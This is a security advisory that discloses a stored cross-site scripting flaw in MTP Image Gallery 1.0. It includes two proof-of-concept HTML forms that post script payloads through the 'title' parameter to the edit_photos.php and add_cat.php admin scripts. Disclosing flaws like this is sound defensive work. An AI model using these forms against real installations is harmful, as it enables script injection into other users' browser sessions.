MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability

Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: MTP Image Gallery offers more control, better
uploading and enhanced performance. With MTP Image Gallery
you can easily create and maintain albums of photos via an
intuitive, web interface.

Desc: MTP Image Gallery suffers from a stored XSS vulnerability
when parsing user input to the 'title' parameter via POST method
thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Linux, Apache2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2013-5130
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php



<title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title>
<form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="Filedata" value="" />
<input type="hidden" name="cats" value="12" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="views" value="1" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="author" value="lqwrm" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
<br /><br />
<form method="POST" action="http://localhost/gallery/admin/add_cat.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="cats" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="submit" value="XSS #2" />
Rate this post
Брой прочитания на тази страница: 914
MTP Image Gallery 1.0 (edit_photos.php, title param) – XSS Vulnerability
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *